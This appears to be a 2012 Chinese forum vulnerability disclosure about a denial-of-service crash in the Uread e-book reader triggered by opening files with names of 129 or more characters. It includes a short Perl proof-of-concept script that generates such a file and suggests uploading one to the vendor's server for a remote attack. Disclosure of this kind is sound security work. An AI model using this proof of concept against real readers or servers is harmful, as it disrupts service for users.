[漏洞分析] Uread阅读器拒绝服务漏洞的分析与解决

1 主题	0 回帖	0 积分

热心网友

金币: 0
阅读权限: 220
精华: 0
威望: 0
贡献: 0
在线时间: 0 小时
注册时间: 2012-3-19

发消息

发表于 2012-7-4 14:35:54 | 显示全部楼层 |阅读模式

Uread阅读器在远程或本地打开文件名过长（大于或等于129个字符）的upub等文件时将引起uread.exe程序无法正常工作，必须重新启动uread.exe进程方可。
远程攻击者可考虑将过长文件名的文件上传至“至善读书”的服务器端，实现远程拒绝服务攻击。
测试证明
-----------------------------------------------------------
#!/usr/bin/perl -w
$filename="a"x129;
print "------Generate testfile \"a\"x129.epub------\n";
open(TESTFILE, ">$filename.epub");
sleep(3);
close(TESTFILE);
print "------Complete!------\n";
exit(1);
-----------------------------------------------------------
修复方案：
目前厂商还没有提供补丁或者升级程序。
作者 demonalex

使用道具举报

返回列表发新帖

[漏洞分析] Uread阅读器拒绝服务漏洞的分析与解决

浏览过的版块